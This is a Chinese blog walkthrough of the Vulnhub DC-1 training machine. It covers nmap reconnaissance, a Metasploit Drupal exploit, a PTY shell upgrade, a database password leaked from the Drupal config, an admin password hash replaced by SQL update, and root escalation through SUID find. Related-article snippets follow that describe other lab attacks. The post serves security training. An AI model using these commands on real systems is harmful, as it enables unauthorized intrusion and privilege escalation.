[vulhub靶机通关]DC-1(suid提权)

最新推荐文章于 2025-12-11 17:18:53 发布
原创 最新推荐文章于 2025-12-11 17:18:53 发布 · 170 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全 #web安全

实验步骤

1.信息收集

我们先用wein7攻击机的nmap去探测存活的主机

确定了dc1靶机的ip地址为192.168.89.128

我们用nmap继续扫描该主机开放的端口

发现了80端口是开着的

用wappalyzer查看用的是什么中间件 以及对应服务器的版本方便我们后续 渗透

2.漏洞利用

在msf上找drupal的exp

我们使用第二个进行攻击

设置payload

用python写一个交互脚本

python -c 'import pty; pty.spawn("/bin/bash")'

查看当前目录找到flag1

根据提示让我们查看配置文件

拿到了第二个flag和数据库的账户和密码

'database' => 'drupaldb',
      'username' => 'dbuser',
      'password' => 'R0ck3t',
      'host' => 'localhost',
      'port' => '',
      'driver' => 'mysql',
      'prefix' => '',

进入数据库发现 密码被加密了 我们在本机上找一找有没有加密的文件

找到了password.test 我们用php 让他跑一个123456的密码

$S$DhaeZs3iItHVVeqQLASSpdafglTf0Gi2G48gnPvRxA15h5ueSzAz

我们用这个密码 更换admin的密码

update users set pass="$S$DhaeZs3iItHVVeqQLASSpdafglTf0Gi2G48gnPvRxA15h5ueSzAz" where name="admin";

找到flag3 提示需要提权找到文件中的用户

找到了find命令有suid权限 我们构造一个payload

find . -exec "/bin/sh" \;

在home目录下找到了flag4

在root目录下找到了 最终flag

the final flag

【Vulnhub靶机DC-5(suid)
过期的秋刀鱼
08-06 545
信息收集主机发现 netdiscouver端口扫描 nmap目录爆破 dirsearch漏洞利用bp抓包分析footer.php,有文件包含漏洞木马上传,查看日志反弹shellpython交互shell find / -user root -perm /4000 2 > /dev/nulllibhax.c和rootshell.c文件的编译 run.sh bash ./run.sh
【Vulnhub靶机渗透测试】之DC-1SUID
Pluto.的博客
12-27 1096
文章目录Vulnhub靶机渗透测试DC-11. 信息收集2. 漏洞利用 Vulnhub靶机渗透测试 DC-1 环境搭建 靶机镜像下载地址:https://www.vulnhub.com/entry/dc-1,292/; 需要将靶机和kali攻击机放在同一个局域网里; kali的IP地址:192.168.40.1311. 信息收集 使用 nmap 扫描 192.168.40.0/24 网段存活主机 nmap -sP 192.168.40.0/24 简单分析可知,靶机ip为 192
靶机渗透练习37-Corrosion2
hirak0的博客
04-18 1588
靶机描述 靶机地址:https://www.vulnhub.com/entry/corrosion-2,745/ Description Difficulty: Medium Hint: Enumeration is key. 一、搭建靶机环境 攻击机Kali: IP地址:192.168.184.128 靶机: IP地址:192.168.184.147 注:靶机与Kali的IP地址只需要在同一局域网即可(同一个网段,即两虚拟机处于同一网络模式) 二、实战 2.1网络扫描 2.1.1 启动靶机和K
Suid之find靶机渗透实战
PANDA墨森的博客
07-11 1668
这是vulnhub靶机系列文章的第十一篇,本次主要知识点为:drupal漏洞利用,suid之find命令 靶机下载地址:https://www.vulnhub.com/entry/dc-1-1,292/ 原文链接:https://www.cnblogs.com/PANDA-Mosen/p/13229881.html #001 实验环境 攻击机:kali :192.168.136.129 靶机192.168.136.136 #002 寻找靶机ip Kali下使用netdisco..
linux系统suid
focus on security
05-19 5912
SUID 0x01什么是SUIDSUID (Set UID)是Linux中的一种特殊限,其功能为用户运行某个程序时,如果该程序有SUID限,那么程序运行为进程时,进程的属主不是发起者,而是程序文件所属的属主。但是SUID限的设置只针对二进制可执行文件,对于非可执行文件设置SUID没有任何意义. ​ 在执行过程中,调用者会暂时获得该文件的所有者限,且该限只在程序执行的过程中有效. 通俗的来讲,假设我们现在有一个可执行文件ls,其属主为root,当我们通过非root用户登录时,如果
Vulhub-DC-1靶场通关攻略
weixin_51339377的博客
03-16 4009
靶场环境配置: 修改为usb1.0同时新建网络,把网络修改为NAT即可 首先开启靶机环境和kali黑客机器环境 通过NAT模式可以保证两者处于同一个内网环境中 切记 vmware和virtualbox的虚拟网卡可能网段不同 所以要保证kali和靶机在同一个网段 否则无法扫描到相应的靶机 1.第一步 通过kali中自带的一个工具 arp-scan进行内网存活主机探测 arp-scan -l 2.接下来可以借助nmap对目标进行扫描 其中 -sV服务指纹识别 可以探测目标系统...
[vulhub靶机通关]DC-4(hydra爆破_exim4_teehee)
woxinweizhou的博客
11-05 223
摘要:通过主机探测和端口扫描发现目标系统漏洞,利用爆破获取登录密码"happy"。在命令执行页面抓包修改参数,成功反弹shell到Kali。使用SUID技术,通过exim4漏洞获取root限。此外还发现teehee方法,修改/etc/passwd文件创建特用户。整个渗透过程涉及信息收集、漏洞利用、升等多个环节,最终在两处获取系统flag。
Vulhub-DC-1靶场实战》
weixin_47118413的博客
07-06 2584
DC系列目前总共有9个靶机,本次靶机DC-1 ,下载,靶机中一共有五个flag文件,我们需要找到它们,即完成任务。
DC-9靶机通关
qq_63831588的博客
11-01 1073
端口扫描,sql注入,文件包含,爆破,端口敲门,sudo
(VulnHub靶机通关DC-9
yang1234567898的博客
01-23 950
靶机下载地址:https://download.vulnhub.com/dc/DC-9.zip 主机发现 IP:192.168.43.192 80端口为开放状态,22端口是filtered状态 web渗透 访问80端口的web服务,打开Search界面,输入1' or 1=1 # 存在sql注入 burpsuite抓包然后保存为DC.txt,然后用sqlmap进行爆破 爆库名 python sqlmap.py -r "C:\Users\11989\Desktop\DC.
Vulnhub靶机:DC-8渗透详细过程
IerkeU的博客
03-28 3229
DC-8 前情要 靶场地址:https://www.vulnhub.com/entry/dc-8,367/ DC-8是一个中级的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 翻译一下官方给出的一些信息: 这个挑战试图证明在 Linux 上安装和配置的双重身份验证是否可以防止 Linux 服务器被攻击。这个挑战的最终目标是绕过双重身份验证,获取根并读取唯一标志。除非您尝试通过SSH登录,否则您可能甚至不知道安装和配置了双重身份验
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-3
苏生要努力
04-25 840
直接使用VMware导入打开就行。
VulnHub靶机 DC-7 打靶 渗透详细流程
网络空间安全学习
04-22 1509
主机发现—端口扫描—目录爆破发现后台—服务探测—白盒测试(源码当中找配置文件)—ssh远程登录—邮件信息—找到备份文件脚本—发现脚本当中的drush命令—修改后台密码—进入后台—寻找可代码执行或getshell地方—drupal8不允许执行命令(模块)—下载新的插件—getshell—反弹shell—追加反弹命令—即可。由于我们上一步骤已经得到了backups.sh脚本属主为root,属组为www-data,所以我们将反弹shell命令添加到脚本当中,等待执行脚本反弹shell即可得到root限。
渗透测试综合靶场 DC-1 通关详解
goldfish8848的博客
09-18 2129
我们收集信息的第一步首先用到了nmap来探测IP和开放端口。nmap(网络映射器)是一款开源的网络扫描和安全审计工具,它可以用来发现网络上的设备,检测开放的端口,确定运行在网络设备上的服务及其版本信息,以及检测潜在的安全漏洞。常用nmap命令:nmap -sn 目标IP地址:快速扫描目标网络,仅用于主机发现,不扫描端口。nmap -sn 目标IP地址/24:扫描整个C类子网。nmap 目标IP地址:扫描目标IP地址上的常见端口。nmap -p 端口号 目标IP地址:扫描特定端口。
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8848
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
2023年全国网络安全行业职业技能大赛-电子数据取证分析师-初赛C卷(15号)-Writeup
最新发布
Aluxian_的博客
12-11 492
总体要求:根据供的检材,完成指定电子数据取。
渗透测试行业术语扫盲(第六篇)—— Web安全专用类术语
qq_39241682的博客
12-09 885
Web是渗透测试的主战场。要在此作战,不仅要懂攻击漏洞(如上一篇所述),更要理解支撑Web运行的基础身份机制、浏览器安全规则以及攻防双方使用的具体工具与载荷。本篇将深入Web安全的“皮下组织”,从维持登录状态的Cookie,到攻击者留下的Webshell,再到防御者的CSP策略,为你揭示这个战场的完整规则与装备图景。
PolarCTF网络安全2025冬季个人挑战赛 wp
lpppp小公主的博客
12-09 981
PolarCTF网络安全2025冬季个人挑战赛复现
DC-1靶机渗透测试攻略及DC-2靶机简介
DC-1靶机是Vulnhub供的众多靶机之一,专门设计用于学习和练习渗透测试技术。 DC-1靶机描述中到的渗透测试,是指一种旨在评估计算机系统安全性的方法,通过尝试攻击系统来找到安全弱点。渗透测试人员(俗称“白...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值